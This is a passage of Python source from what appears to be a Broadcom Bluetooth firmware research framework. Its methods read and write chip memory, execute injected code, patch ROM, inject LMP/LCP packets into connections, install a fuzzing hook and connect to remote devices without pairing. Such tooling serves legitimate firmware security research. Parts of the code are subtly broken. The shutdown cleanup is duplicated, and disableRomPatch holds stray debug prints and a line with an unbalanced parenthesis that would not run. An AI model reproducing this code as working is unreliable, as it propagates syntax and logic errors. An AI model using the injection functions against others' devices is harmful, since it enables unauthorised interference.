if self.__class__.__name__ == "iOSCore":
iOS = True
self.fw = Firmware(subversion, iOS).firmware
# Safe to turn diagnostic logging on, it just gets a timeout if the Android
# driver was recompiled with other flags but without applying a proper patch.
log.info("Try to enable debugging on H4 (warning if not supported)...")
self.enableBroadcomDiagnosticLogging(True)
return True
def shutdown(self):
# type: () -> None
"""
Shutdown the framework by stopping the send and recv threads. Socket shutdown
also terminates port forwarding if adb is used.
"""
# Setting exit_requested to True will stop the send and recv threads at their
# next while loop iteration
self.exit_requested = True
# unregister stackDumpReceiver callback:
if self.stackDumpReceiver is not None:
self.stackDumpReceiver = None
# unregister stackDumpReceiver callback:
if self.stackDumpReceiver is not None:
self.unregisterHciCallback(self.stackDumpReceiver.recvPacket)
# Wait until both threads have actually finished
self.recvThread.join()
self.sendThread.join()
# Disconnect the TCP sockets
self._teardownSockets()
if self.write_btsnooplog:
self.btsnooplog_file.close()
self.running = False
self.exit_requested = False
log.info("Shutdown complete.")
def registerHciCallback(self, callback):
# type: (Callable[[Record], None ]) -> None
"""
Add a new callback function to self.registeredHciCallbacks.
The function will be called every time the recvThread receives
a HCI packet. The packet will be passed to the callback function
as first argument. The format is a tuple containing:
- HCI packet (subclass of HCI, see hci.py)
- original length
- inc_len
- flags
- drops
- timestamp (python datetime object)
"""
if callback in self.registeredHciCallbacks:
log.warn("registerHciCallback: callback already registered!")
return
self.registeredHciCallbacks.append(callback)
def unregisterHciCallback(self, callback):
# type: (Callable[[Tuple[HCI, int, int, int, Any, datetime.datetime]], None ]) -> None
"""
Remove a callback function from self.registeredHciCallbacks.
"""
if callback in self.registeredHciCallbacks:
self.registeredHciCallbacks.remove(callback)
return
log.warn("registerHciCallback: no such callback is registered!")
def registerHciRecvQueue(self, queue, filter_function=None):
# type: (queue2k.Queue[Record], FilterFunction) -> None
"""
Add a new queue to self.registeredHciRecvQueues.
The queue will be filled by the recvThread every time the thread receives
a HCI packet. The format of the packet is a tuple containing:
- HCI packet (subclass of HCI, see hci.py)
- original length
- inc_len
- flags
- drops
- timestamp (python datetime object)
If filter_function is not None, the tuple will first be passed
to the function and only if the function returns True, the packet
is put into the queue.
"""
if queue in self.registeredHciRecvQueues:
log.warn("registerHciRecvQueue: queue already registered!")
return
self.registeredHciRecvQueues.append((queue, filter_function))
def unregisterHciRecvQueue(self, queue):
# type: (queue2k.Queue[Tuple[HCI, int, int, int, Any, datetime]]) -> None
"""
Remove a queue from self.registeredHciRecvQueues.
"""
for entry in self.registeredHciRecvQueues:
if entry[0] == queue:
self.registeredHciRecvQueues.remove(entry)
return
log.warn("registerHciRecvQueue: no such queue is registered!")
def sendHciCommand(
self, hci_opcode: HCI_COMND, data: bytes, timeout: int = 3
) -> Optional[bytearray]:
"""
Send an arbitrary HCI command packet by pushing a send-task into the
sendQueue. This function blocks until the response is received
or the timeout expires. The return value is the Payload of the
HCI Command Complete Event which was received in response to
the command or None if no response was received within the timeout.
"""
# Support legacy code that passes an integer instead of a HCI_COMND for now
# This would be more elegant with a
# flag that can be set to allow arbitrary bytes for the HCI command but that would require literal types
# (PEP586) which are only supported with python 3.8+
# For static type analysis this is good enough, because if someone hardcodes some hci command they might as well document it
if isinstance(hci_opcode, HCI_COMND):
opcode = hci_opcode.value
elif isinstance(hci_opcode, int):
opcode = hci_opcode
else:
raise ValueError(
"opcode parameter to sendHciCommand must be either integer or HCI_COMND enum member"
)
# TODO: If the response is a HCI Command Status Event, we will actually
# return this instead of the Command Complete Event (which will
# follow later and will be ignored). This should be fixed..
queue = queue2k.Queue(1)
# standard HCI command structure
payload = p16(opcode) + p8(len(data)) + data
# define a filter function which recognizes the response (command complete
# or command status event).
def recvFilterFunction(record):
# type: (Record) -> bool
hcipkt = record[0]
log.debug("sendHciCommand.recvFilterFunction: got response")
# Interpret HCI event
if isinstance(hcipkt, hci.HCI_Event):
if hcipkt.event_code == 0x0E: # Cmd Complete event
if u16(hcipkt.data[1:3]) == opcode:
return True
if hcipkt.event_code == 0x0F: # Cmd Status event
if u16(hcipkt.data[2:4]) == opcode:
return True
return False
try:
self.sendQueue.put(
(hci.HCI.HCI_CMD, payload, queue, recvFilterFunction), timeout=timeout
)
ret = queue.get(timeout=timeout)
return ret
except queue2k.Empty:
log.warn("sendHciCommand: waiting for response timed out!")
# If there was no response because the Trace Replay Hook throw an assert it will be in this attribute.
# Raise this so the main thread doesn't ignore this and it will be caught by any testing framework
if hasattr(self, "test_failed"):
raise self.test_failed
return None
except queue2k.Full:
log.warn("sendHciCommand: send queue is full!")
return None
def sendH4(self, h4type, data, timeout=2):
# type: (HCI_CMD, bytes, int) -> bool
"""
Send an arbitrary H4 packet by pushing a send-task into the
sendQueue. This function does not wait for a response! If you
need to receive a response, register an hciRecvQueue or -callback.
The return value is True if the send-task could be put inside the
queue and False if it was not possible within the timeout.
"""
try:
self.sendQueue.put((h4type, data, None, None), timeout=timeout)
return True
except queue2k.Full:
log.warn("sendH4: send queue is full!")
return False
def recvPacket(self, timeout=None):
# type: (Optional[int]) -> Optional[Record]
"""
This function polls the recvQueue for the next available HCI
packet and returns it. The function checks whether it is called
from the sendThread or any other thread and respectively chooses
either the sendThreadrecvQueue or the recvQueue. (FIXME: no it does not?!)
The recvQueue is filled by the recvThread. If the queue fills up
the recvThread empties the queue (unprocessed packets are lost).
The recvPacket function is meant to receive raw HCI packets in
a blocking manner. Consider using the registerHciCallback()
functionality as an alternative which works asynchronously.
"""
log.debug("recvPacket: called")
if not self.check_running():
return None
try:
return self.recvQueue.get(timeout=timeout)
except queue2k.Empty:
return None
def readMem(self, address, length, progress_log=None, bytes_done=0, bytes_total=0):
# type: (Address, int, Optional[Any], int, int) -> Optional[bytes]
"""
Reads <length> bytes from the memory space of the firmware at the given
address. Reading from unmapped memory or certain memory-mapped-IO areas
which need aligned access crashes the chip.
Optional arguments for progress logs:
- progress_log: An instance of log.progress() which will be updated during the read.
- bytes_done: Number of bytes that have already been read with earlier calls to
readMem() and belonging to the same transaction which is covered by progress_log.
- bytes_total: Total bytes that will be read within the transaction covered by progress_log.
"""
log.debug("readMem: reading at 0x%x" % address)
if not self.check_running():
return None
read_addr = address # read_addr is the address of the next Read_RAM HCI command
byte_counter = 0 # tracks the number of received bytes
outbuffer = (
bytearray()
) # buffer which stores all accumulated data read from the chip
if bytes_total == 0: # If no total bytes where given just use length
bytes_total = length
retry = 3 # Retry on failures
while (
read_addr < address + length
): # Send HCI Read_RAM commands until all data is received
# Send hci frame
bytes_left = length - byte_counter
blocksize = bytes_left
if blocksize > 251: # The max. size of a Read_RAM payload is 251
blocksize = 251
# Send Read_RAM (0xfc4d) command
response = self.sendHciCommand(
HCI_COMND.VSC_Read_RAM, p32(read_addr) + p8(blocksize)
)
if response is None or not response:
log.warn(
"readMem: No response to readRAM HCI command! (read_addr=%x, len=%x)"
% (read_addr, length)
)
# Retry once...
if retry > 0:
log.debug("readMem: retrying once...")
retry = retry - 1
continue
else:
log.warning("readMem: failed!")
return None
data = response[4:] # start of the actual data is at offset 4
if len(data) == 0: # this happens i.e. if not called on a brcm chip
log.warn("readMem: empty response, quitting...")
break
if len(data) != blocksize:
log.debug("readMem: insufficient bytes returned, retrying...")
continue
status = response[3]
if status != 0:
# It is not yet reverse engineered what this byte means. For almost
# all memory addresses it will be 0. But for some it will be different,
# EDIT: response should be a command complete event (event code 0x0e). The 4 byte (response[3]) indicates the hci error code
# 0x00 (0) means everything okay
# 0x12 means Command Disallowed
# e.g. for address 0xff000000 (aka 'EEPROM') it is 0x12
log.warn(
"readMem: [TODO] Got status != 0 : error 0x%02X at address 0x%08x"
% (status, read_addr)
)
break
# do double checking, but prevent loop
if self.doublecheck and retry > 0:
response_check = self.sendHciCommand(
HCI_COMND.VSC_Read_RAM, p32(read_addr) + p8(blocksize)
)
if response != response_check:
log.debug(
"readMem: double checking response failed at 0x%x! retry..."
% read_addr
)
time.sleep(0.3)
retry = retry - 1
continue
outbuffer += data
read_addr += len(data)
byte_counter += len(data)
if progress_log is not None:
msg = "receiving data... %d / %d Bytes (%d%%)" % (
bytes_done + byte_counter,
bytes_total,
old_div((bytes_done + byte_counter) * 100, bytes_total),
)
progress_log.status(msg)
retry = 3 # this round worked, so we re-enable retries
return outbuffer
def readMemAligned(
self, address, length, progress_log=None, bytes_done=0, bytes_total=0
):
# type: (int, int, Optional[Any], int, int) -> Any
"""
This is an alternative to readMem() which enforces a strictly aligned access
to the memory that is read. This is needed for e.g. the memory-mapped-IO
section at 0x310000 (patchram) and possibly other sections as well.
The arguments are equivalent to readMem() except that the address and length
have to be 4-byte aligned.
The current implementation works like this (and obviously can be improved!):
- Work in chunks of max. 244 bytes (restricted by max. size of HCI event)
- For each chunk do:
- Write a code snippet to the firmware which copies the chunk of memory
into a custom HCI Event and sends it to the host (this uses aligned
ldr and str instructions)
- Register a hciCallbackFunction for receiving the custom event
"""
# Check if constants are defined in fw.py
for const in ["READ_MEM_ALIGNED_ASM_LOCATION", "READ_MEM_ALIGNED_ASM_SNIPPET"]:
if const not in dir(self.fw):
log.warn(
"readMemAligned: '%s' not in fw.py. FEATURE NOT SUPPORTED!" % const
)
return False
if not self.check_running():
return None
# Force length to be multiple of 4 (needed for strict alignment)
if length % 4 != 0:
log.warn("readMemAligned: length (0x%x) must be multiple of 4!" % length)
return None
# Force address to be multiple of 4 (needed for strict alignment)
if address % 4 != 0:
log.warn("readMemAligned: address (0x%x) must be 4-byte aligned!" % address)
return None
recvQueue = queue2k.Queue(1)
def hciFilterFunction(record):
# type: (Record) -> bool
hcipkt = record[0]
if not issubclass(hcipkt.__class__, hci.HCI_Event):
return False
if hcipkt.event_code != 0xFF:
return False
if hcipkt.data[0:4] != bytes("READ", "utf-8"):
return False
return True
self.registerHciRecvQueue(recvQueue, hciFilterFunction)
read_addr = address
byte_counter = 0
outbuffer = (
bytearray()
)
if bytes_total == 0:
bytes_total = length
while read_addr < address + length:
bytes_left = length - byte_counter
blocksize = bytes_left
if blocksize > 244:
blocksize = 244
# Customize the assembler snippet with the current read_addr and blocksize
code = asm(
self.fw.READ_MEM_ALIGNED_ASM_SNIPPET
% (blocksize, read_addr, old_div(blocksize, 4)),
vma=self.fw.READ_MEM_ALIGNED_ASM_LOCATION,
arch="thumb",
)
# Write snippet to the RAM (TODO: maybe backup and restore content of this area?)
self.writeMem(self.fw.READ_MEM_ALIGNED_ASM_LOCATION, code)
# Run snippet
if not self.launchRam(self.fw.READ_MEM_ALIGNED_ASM_LOCATION):
# on iOSCore the return value might be wrong
if self.doublecheck:
log.debug("readMemAligned: probably failed, but continuing...")
else:
log.error("readMemAligned: launching assembler snippet failed!")
return None
# wait for the custom HCI event sent by the snippet:
try:
record = recvQueue.get(timeout=1)
except queue2k.Empty:
log.warn("readMemAligned: No response from assembler snippet.")
return None
hcipkt = record[0]
data = hcipkt.data[4:]
outbuffer += data
read_addr += len(data)
byte_counter += len(data)
if progress_log is not None:
msg = "receiving data... %d / %d Bytes (%d%%)" % (
bytes_done + byte_counter,
bytes_total,
old_div((bytes_done + byte_counter) * 100, bytes_total),
)
progress_log.status(msg)
self.unregisterHciRecvQueue(recvQueue)
return outbuffer
def writeMem(self, address, data, progress_log=None, bytes_done=0, bytes_total=0):
# type: (int, bytes, Optional[Any], int, int) -> Optional[bool]
"""
Writes the <data> to the memory space of the firmware at the given
address.
Optional arguments for progress logs:
- progress_log: An instance of log.progress() which will be updated during the write.
- bytes_done: Number of bytes that have already been written with earlier calls to
writeMem() and belonging to the same transaction which is covered by progress_log.
- bytes_total: Total bytes that will be written within the transaction covered by progress_log.
"""
log.debug("writeMem: writing to 0x%x" % address)
if not self.check_running():
return None
write_addr = address
byte_counter = 0
if bytes_total == 0:
bytes_total = len(data)
while byte_counter < len(data):
# Send hci frame
bytes_left = len(data) - byte_counter
blocksize = bytes_left
if blocksize > 251:
blocksize = 251
response = self.sendHciCommand(
HCI_COMND.VSC_Write_RAM,
p32(write_addr) + data[byte_counter : byte_counter + blocksize],
)
if response is None:
log.warn(
"writeMem: Timeout while reading response, probably need to wait longer."
)
return False
elif response[3] != 0:
log.warn(
"writeMem: Got error code %d in command complete event."
% response[3]
)
return False
write_addr += blocksize
byte_counter += blocksize
if progress_log is not None:
msg = "sending data... %d / %d Bytes" % (
bytes_done + byte_counter,
bytes_total,
)
progress_log.status(msg)
return True
def launchRam(self, address):
# type: (int) -> bool
"""
Executes a function at the specified address in the context of the HCI
handler thread. The function has to comply with the calling convention.
As the function blocks the HCI handler thread, the chip will most likely
crash (or be resetted by Android) if the function takes too long.
"""
response = self.sendHciCommand(HCI_COMND.VSC_Launch_RAM, p32(address))
if response is None:
log.warn(
"Empty HCI response during launchRam, driver crashed due to invalid code or destination"
)
return False
error_code = response[3]
if error_code != 0:
log.warn("Got error code %x in command complete event." % error_code)
return False
# Nexus 6P Bugfix
if "LAUNCH_RAM_PAUSE" in dir(self.fw) and self.fw.LAUNCH_RAM_PAUSE:
log.debug("launchRam: Bugfix, sleeping %ds" % self.fw.LAUNCH_RAM_PAUSE)
time.sleep(self.fw.LAUNCH_RAM_PAUSE)
return True
def getPatchramState(self):
# type: () -> Union[bool, Tuple[List[Optional[int]], List[Union[Union[int, bytes, None], Any]], list]]
"""
Retrieves the current state of the patchram unit. The return value
is a tuple containing 3 lists which are indexed by the slot number:
- target_addresses: The address which is patched by this slot (or None)
- new_values: The new (patch) value (or None)
- enabled_bitmap: 1 if the slot is active, 0 if not (integer)
"""
# Check if constants are defined in fw.py
for const in [
"PATCHRAM_TARGET_TABLE_ADDRESS",
"PATCHRAM_ENABLED_BITMAP_ADDRESS",
"PATCHRAM_VALUE_TABLE_ADDRESS",
"PATCHRAM_NUMBER_OF_SLOTS",
"PATCHRAM_ALIGNED",
]:
if const not in dir(self.fw):
log.warn(
"getPatchramState: '%s' not in fw.py. FEATURE NOT SUPPORTED!"
% const
)
return False
slot_count = self.fw.PATCHRAM_NUMBER_OF_SLOTS
# On Nexus 5, ReadMemAligned is required, while Nexus 6P supports this memory area with ReadRAM
if self.fw.PATCHRAM_ALIGNED:
slot_dump = self.readMemAligned(
self.fw.PATCHRAM_ENABLED_BITMAP_ADDRESS, old_div(slot_count, 4)
)
table_addr_dump = self.readMemAligned(
self.fw.PATCHRAM_TARGET_TABLE_ADDRESS, slot_count * 4
)
else:
slot_dump = self.readMem(
self.fw.PATCHRAM_ENABLED_BITMAP_ADDRESS, old_div(slot_count, 4)
)
table_addr_dump = self.readMem(
self.fw.PATCHRAM_TARGET_TABLE_ADDRESS, slot_count * 4
)
table_val_dump = self.readMem(
self.fw.PATCHRAM_VALUE_TABLE_ADDRESS, slot_count * 4
)
table_addresses = []
table_values = []
slot_dwords = []
slot_bits = []
for dword in range(old_div(slot_count, 32)):
slot_dwords.append(slot_dump[dword * 32 : (dword + 1) * 32])
for dword in slot_dwords:
slot_bits.extend(bits(bytes(dword[::-1]))[::-1])
for i in range(slot_count):
if slot_bits[i]:
table_addresses.append(u32(table_addr_dump[i * 4 : i * 4 + 4]) << 2)
table_values.append(table_val_dump[i * 4 : i * 4 + 4])
else:
table_addresses.append(None)
table_values.append(None)
return (table_addresses, table_values, slot_bits)
def patchRom(self, address, patch, slot=None):
# type: (Address, Any, Optional[Any]) -> bool
"""
Patch a 4-byte value (DWORD) inside the ROM section of the firmware
(0x0 - 0x8FFFF) using the patchram mechanism. There are 128 available
slots for patches and patchRom() will automatically find the next free
slot if it is not forced through the 'slot' argument (see also
getPatchramState()).
address: The address at which the patch should be applied
(if the address is not 4-byte aligned, the patch will be splitted into two slots)
patch: The new value which should be placed at the address (byte string of length 4)
Returns True on success and False on failure.
"""
# Check if constants are defined in fw.py
for const in [
"PATCHRAM_TARGET_TABLE_ADDRESS",
"PATCHRAM_ENABLED_BITMAP_ADDRESS",
"PATCHRAM_VALUE_TABLE_ADDRESS",
"PATCHRAM_NUMBER_OF_SLOTS",
]:
if const not in dir(self.fw):
log.warn("patchRom: '%s' not in fw.py. FEATURE NOT SUPPORTED!" % const)
return False
if len(patch) != 4:
log.warn("patchRom: patch (%s) must be a 32-bit dword!" % patch)
return False
log.debug(
"patchRom: applying patch 0x%x to address 0x%x" % (u32(patch), address)
)
alignment = address % 4
if alignment != 0:
log.debug("patchRom: Address 0x%x is not 4-byte aligned!" % address)
if slot is not None:
log.warn(
"patchRom: Patch must be splitted into two slots, but fixed slot value was enforced. Do nothing!"
)
return False
log.debug("patchRom: applying patch 0x%x in two rounds" % u32(patch))
# read original content
orig = self.readMem(address - alignment, 8)
# patch the difference of the 4 bytes we want to patch within the original 8 bytes
self.patchRom(
address - alignment, orig[:alignment] + patch[: 4 - alignment], slot
)
self.patchRom(
address - alignment + 4,
patch[4 - alignment :] + orig[alignment + 4 :],
slot,
)
return True
table_addresses, table_values, table_slots = self.getPatchramState()
# Check whether the address is already patched:
for i in range(self.fw.PATCHRAM_NUMBER_OF_SLOTS):
if table_addresses[i] == address:
slot = i
log.info(
"patchRom: Reusing slot for address 0x%x: %d" % (address, slot)
)
# Write new value to patchram value table at 0xd0000
self.writeMem(self.fw.PATCHRAM_VALUE_TABLE_ADDRESS + slot * 4, patch)
return True
if slot is None:
# Find free slot:
for i in range(self.fw.PATCHRAM_NUMBER_OF_SLOTS):
if table_addresses[i] is None:
slot = i
log.info("patchRom: Choosing next free slot: %d" % slot)
break
if slot is None:
log.warn("patchRom: All slots are in use!")
return False
else:
if table_values[slot] == 1:
log.warn("patchRom: Slot %d is already in use. Overwriting..." % slot)
# Write new value to patchram value table at 0xd0000
self.writeMem(self.fw.PATCHRAM_VALUE_TABLE_ADDRESS + slot * 4, patch)
# Write address to patchram target table at 0x310000
self.writeMem(
self.fw.PATCHRAM_TARGET_TABLE_ADDRESS + slot * 4, p32(address >> 2)
)
# Enable patchram slot (enable bitfield starts at 0x310204)
# (We need to enable the slot by setting a bit in a multi-dword bitfield)
target_dword = int(old_div(slot, 32))
table_slots[slot] = 1
slot_dword = unbits(
table_slots[target_dword * 32 : (target_dword + 1) * 32][::-1]
)[::-1]
self.writeMem(
self.fw.PATCHRAM_ENABLED_BITMAP_ADDRESS + target_dword * 4, slot_dword
)
return True
def disableRomPatch(self, address, slot=None):
# type: (int, Optional[int]) -> bool
"""
Disable a patchram slot (see also patchRom()). The slot can either be
specified by the target address (address that was patched) or by providing
the slot number directly (the address will be ignored in this case).
Returns True on success and False on failure.
"""
# Check if constants are defined in fw.py
for const in [
"PATCHRAM_TARGET_TABLE_ADDRESS",
"PATCHRAM_ENABLED_BITMAP_ADDRESS",
]:
if const not in dir(self.fw):
log.warn(
"disableRomPatch: '%s' not in fw.py. FEATURE NOT SUPPORTED!" % const
)
return False
table_addresses, table_values, table_slots = self.getPatchramState()
print("A\n"*20)
if slot is None:
if address is None:
log.warn("disableRomPatch: address is None.")
return False
for i in range(self.fw.PATCHRAM_NUMBER_OF_SLOTS):
log.info("Slot for address 0x%x used by %d\n" % table_addresses[i], slot))
if table_addresses[i] == address:
slot = i
log.info("Slot for address 0x%x is: %d" % (address, slot))
break
log.info("AAAAAAAAAAAAA")
if slot is None:
log.warn("No slot contains address: 0x%x" % address)
return False
# Disable patchram slot (enable bitfield starts at 0x310204)
# (We need to disable the slot by clearing a bit in a multi-dword bitfield)
target_dword = int(old_div(slot, 32))
table_slots[slot] = 0
slot_dword = unbits(
table_slots[target_dword * 32 : (target_dword + 1) * 32][::-1]
)[::-1]
self.writeMem(
self.fw.PATCHRAM_ENABLED_BITMAP_ADDRESS + target_dword * 4, slot_dword
)
# Write 0xFFFFC to patchram target table at 0x310000
# (0xFFFFC seems to be the default value if the slot is inactive)
self.writeMem(
self.fw.PATCHRAM_TARGET_TABLE_ADDRESS + slot * 4, p32(0xFFFFC >> 2)
)
return True
def readConnectionInformation(self, conn_number):
# type: (ConnectionNumber) -> Optional[ConnectionInformation]
"""
Reads and parses a connection struct based on the connection number.
Note: The connection number is different from the connection index!
The connection number starts counting at 1 and is stored in the first
field of the connection structure.
The connection index starts at 0 and is the index into the connection
table (table containing all connection structs).
In the Nexus 5 firmware all connection numbers are simply the connection
index increased by 1.
The return value is a ConnectionInformation object containing all information that could
be parsed from the connection structure. If the connection struct at the
specified connection number is empty, the return value is None.
"""
# Check if constants are defined in fw.py
# Do we have an array implementation?
is_array = True
for const in [
"CONNECTION_MAX",
"CONNECTION_ARRAY_ADDRESS",
"CONNECTION_STRUCT_LENGTH",
]:
if const not in dir(self.fw):
is_array = False
# Do we have a list implementation?
for const in ["CONNECTION_LIST_ADDRESS"]:
if const not in dir(self.fw):
log.warn(
"readConnectionInformation: neither CONNECTION_LIST nor CONNECTION_ARRAY in fw.py. FEATURE NOT SUPPORTED!"
)
return None
if conn_number < 1 or conn_number > self.fw.CONNECTION_MAX:
log.warn(
"readConnectionInformation: connection number out of bounds: %d"
% conn_number
)
return None
if is_array:
connection = self.readMem(
Address(
self.fw.CONNECTION_ARRAY_ADDRESS
+ self.fw.CONNECTION_STRUCT_LENGTH * (conn_number - 1)
),
self.fw.CONNECTION_STRUCT_LENGTH,
)
else:
connection_memaddr = Address(
u32(
self.readMem(
Address(
self.fw.CONNECTION_LIST_ADDRESS + 4 * (conn_number - 1)
),
4,
)
)
)
if connection_memaddr == 0x00000000:
return None
connection = self.readMem(
connection_memaddr, self.fw.CONNECTION_STRUCT_LENGTH
)
if connection == b"\x00" * self.fw.CONNECTION_STRUCT_LENGTH:
return None
conn_dict = ConnectionInformation.from_connection_buffer(connection)
return conn_dict
def sendLmpPacket(
self, opcode, payload="", is_master=True, conn_handle=0x0C, extended_op=False
):
# type: (Opcode, bytes, bool, ConnectionNumber, bool) -> bool
"""
Inject a LMP packet into a Bluetooth connection (i.e. send a LMP packet
to a remote device which is paired and connected with our local device).
This code is using the vendor specific HCI command 0xfc58, which sends
an LMP PDU. Note that Broadcom firmware internally checks opcodes and
lengths, meaning that despite returning success long payloads will be
cut and invalid opcodes might be discarded.
is_master: Determines if we are master or slave within the connection.
conn_handle: The connection handle specifying the connection into which the
packet will be injected. By default, the first connection handle
used by Broadcom is 0x0c.
opcode: The LMP opcode of the LMP packet that will be injected.
payload: The LMP payload of the LMP packet that will be injected.
Can be empty.
extended_op: Set to True if the opcode should be interpreted as extended / escaped
LMP opcode.
Returns True on success and False on failure.
"""
# Check the connection handle
# Range: 0x0000-0x0EFF (all other values reserved for future use)
if conn_handle < 0 or conn_handle > 0x0EFF:
log.warn("sendLmpPacket: connection handle out of bounds: %d" % conn_handle)
return False
# must be string...
if payload is None:
payload = b""
if ((not extended_op) and opcode > (0xFF >> 1)) or (
extended_op and opcode > 0xFF
):
log.warn("sendLmpPacket: opcode out of range!")
return False
# Build the LMP packet
opcode_data = (
p8(opcode << 1 | (not is_master))
if not extended_op
else p8(0x7F << 1 | (not is_master)) + p8(opcode)
)
# Nexus 5 (2012) simply takes any length as argument, but later withdraws bytes if too many were passed.
# Nexus 6P, Raspi 3+ and evaulation board (2014-2018) require a fixed 20 byte length parameter to be passed!
# -> 2 bytes connection handle, 1 byte length, which means 17 bytes for opcode and payload remaining
# sendlmp --data 11223344556677889900112233445566 01 -> actually works
# always pad to 17 data bytes...
data = opcode_data + payload + b"\x00" * (17 - len(opcode_data) - len(payload))
if len(data) > 17:
log.warn(
"sendLmpPacket: Vendor specific HCI command only allows for 17 bytes LMP content."
)
# log.info("packet: " + p16(conn_handle) + p8(len(data)) + data)
result = self.sendHciCommand(
HCI_COMND.VSC_SendLmpPdu,
p16(conn_handle) + p8(len(payload + opcode_data)) + data,
)
if result is None:
log.warn(
"sendLmpPacket: did not get a result from firmware, maybe crashed internally?"
)
return False
else:
error_status = result[3]
if error_status != 0:
log.warn("sendLmpPacket: got error status 0x%02x" % error_status)
return False
return True
def fuzzLmp(self):
# type: ()-> bool
"""
Installs a patch inside the sendLmp HCI handler that allows sending arbitrary
LMP payloads. Afterwards, use sendLmpPacket as before.
Basically, this ignores LM_LmpInfoTable and LM_LmpInfoTableEsc4 contents, but
only via sendLmp HCI and not during normal Link Manager operation.
"""
# Check if constants are defined in fw.py
for const in [
"FUZZLMP_CODE_BASE_ADDRESS",
"FUZZLMP_ASM_CODE",
"FUZZLMP_HOOK_ADDRESS",
]:
if const not in dir(self.fw):
log.warn(
"fuzzLmpPacket: '%s' not in fw.py. FEATURE NOT SUPPORTED!" % const
)
return False
# Assemble the snippet and write it to FUZZLMP_CODE_BASE_ADDRESS
code = asm(
self.fw.FUZZLMP_ASM_CODE,
vma=self.fw.FUZZLMP_CODE_BASE_ADDRESS,
arch="thumb",
)
self.writeMem(self.fw.FUZZLMP_CODE_BASE_ADDRESS, code)
# Install a patch in the end of the original sendLmpPdu HCI handler
patch = asm(
"b 0x%x" % self.fw.FUZZLMP_CODE_BASE_ADDRESS,
vma=self.fw.FUZZLMP_HOOK_ADDRESS,
)
if not self.patchRom(self.fw.FUZZLMP_HOOK_ADDRESS, patch):
log.warn("Error writing to patchram when installing fuzzLmp patch!")
return False
return True
def sendLmpPacketLegacy(self, conn_nr, opcode, payload, extended_op=False):
# type: (int, Opcode, bytes, bool) -> bool
"""
Inject a LMP packet into a Bluetooth connection (i.e. send a LMP packet
to a remote device which is paired and connected with our local device).
This is legacy code only running on BCM4339 based on assembly patches.
conn_nr: The connection number specifying the connection into which the
packet will be injected.
opcode: The LMP opcode of the LMP packet that will be injected.
payload: The LMP payload of the LMP packet that will be injected.
Note: The size of the payload is defined by its opcode.
TODO: Go one step deeper in order to send arbitrary length
LMP packets.
extended_op: Set to True if the opcode should be interpreted as extended / escaped
LMP opcode.
Returns True on success and False on failure.
"""
# Check if constants are defined in fw.py
for const in [
"CONNECTION_MAX",
"SENDLMP_CODE_BASE_ADDRESS",
"SENDLMP_ASM_CODE",
]:
if const not in dir(self.fw):
log.warn(
"sendLmpPacket: '%s' not in fw.py. FEATURE NOT SUPPORTED!" % const
)
return False
# connection number bounds check
if conn_nr < 1 or conn_nr > self.fw.CONNECTION_MAX:
log.warn("sendLmpPacket: connection number out of bounds: %d" % conn_nr)
return False
# Build the LMP packet
# (The TID bit will later be set in the assembler code)
opcode_data = p8(opcode << 1) if not extended_op else p8(0x7F << 1) + p8(opcode)
data = opcode_data + payload
# Prepare the assembler snippet by injecting the connection number
# and appending the LMP packet data.
asm_code = self.fw.SENDLMP_ASM_CODE % (conn_nr) # type: str
asm_code_with_data = asm_code + "".join(
[".byte 0x%02x\n" % x for x in data.ljust(20, b"\x00")]
)
# Assemble the snippet and write it to SENDLMP_CODE_BASE_ADDRESS
code = asm(
asm_code_with_data, vma=self.fw.SENDLMP_CODE_BASE_ADDRESS, arch="thumb"
)
self.writeMem(self.fw.SENDLMP_CODE_BASE_ADDRESS, code)
# Invoke the snippet
if self.launchRam(self.fw.SENDLMP_CODE_BASE_ADDRESS):
return True
else:
log.warn("sendLmpPacket: launchRam failed!")
return False
def sendLcpPacket(self, conn_idx, payload):
# type: (ConnectionIndex, bytes) -> bool
"""
Inject a LCP packet into a Bluetooth LE connection (i.e. send a LCP packet
to a remote device which is paired and connected with our local device).
This is code requires assembly patches.
conn_idx: The connection index specifying the connection into which the
packet will be injected, starting at 0.
payload: The LCP opcode and payload of the LCP packet that will be injected.
Returns True on success and False on failure.
"""
# Check if constants are defined in fw.py
for const in ["SENDLCP_CODE_BASE_ADDRESS", "SENDLCP_ASM_CODE"]:
if const not in dir(self.fw):
log.warn(
"sendLcpPacket: '%s' not in fw.py. FEATURE NOT SUPPORTED!" % const
)
return False
# Prepare the assembler snippet by injecting the connection number
# and appending the LMP packet data.
asm_code = self.fw.SENDLCP_ASM_CODE % (conn_idx, len(payload))
asm_code_with_data = asm_code + "".join(
[".byte 0x%02x\n" % x for x in payload.ljust(20, b"\x00")]
)
# Assemble the snippet and write it to SENDLCP_CODE_BASE_ADDRESS
code = asm(
asm_code_with_data, vma=self.fw.SENDLCP_CODE_BASE_ADDRESS, arch="thumb"
)
self.writeMem(self.fw.SENDLCP_CODE_BASE_ADDRESS, code)
# Invoke the snippet
if self.launchRam(self.fw.SENDLCP_CODE_BASE_ADDRESS):
return True
else:
log.warn("sendLcpPacket: launchRam failed!")
return False
def connectToRemoteDevice(self, bt_addr):
# type: (BluetoothAddress) -> None
"""
Send a HCI Connect Command to the firmware. This will setup
a connection (inserted into the connection structure) if the
remote device (specified by bt_addr) accepts.
To be exact: This will most likely send
- LMP_features_req
- LMP_version_req
- LMP_features_req_ext
- LMP_host_connection_req
- LMP_setup_complete
and also other channel-related packets to the remote device.
The devices do not have to be paired and the remote device
does not need to be visible. This will not initiate the
pairing sequence, therefore the remote host will not show
any notification to the user yet, the host is however notified
via HCI that there is an incomming connection.
bt_addr: address of remote device (byte string)
e.g. for 'f8:95:c7:83:f8:11' you would pass
b'\xf8\x95\xc7\x83\xf8\x11'.
"""
# TODO: expose more of the connection create parameters (instead of
# passing 0's.
self.sendHciCommand(
HCI_COMND.Create_Connection, bt_addr[::-1] + b"\x00\x00\x00\x00\x00\x00\x01"
)
def connectToRemoteLEDevice(self, bt_addr, addr_type=0x00):
# type: (BluetoothAddress, int) -> None
"""
Send a HCI LE Create Connection Command to the firmware as
defined in the Bluetooth Core Specification 5.0 p. 1266.
bt_addr: address of remote device (byte string)
e.g. for 'f8:95:c7:83:f8:11' you would pass
b'\xf8\x95\xc7\x83\xf8\x11'.
addr_type: Public Device (0x00), Random Device (0x01), Public
Identity (0x02), Random static Identity (0x03).
"""
# TODO: expose more of the connection create parameters (instead of
# passing 0's.
self.sendHciCommand(
HCI_COMND.LE_Create_Connection,
b"\x60\x00\x30\x00\x00"
+ p8(addr_type)
+ bt_addr[::-1]
+ b"\x01\x18\x00\x28\x00\x00\x00\xd0\x07\x00\x00\x00\x00",
)
def connectionStatusCallback(self, record):
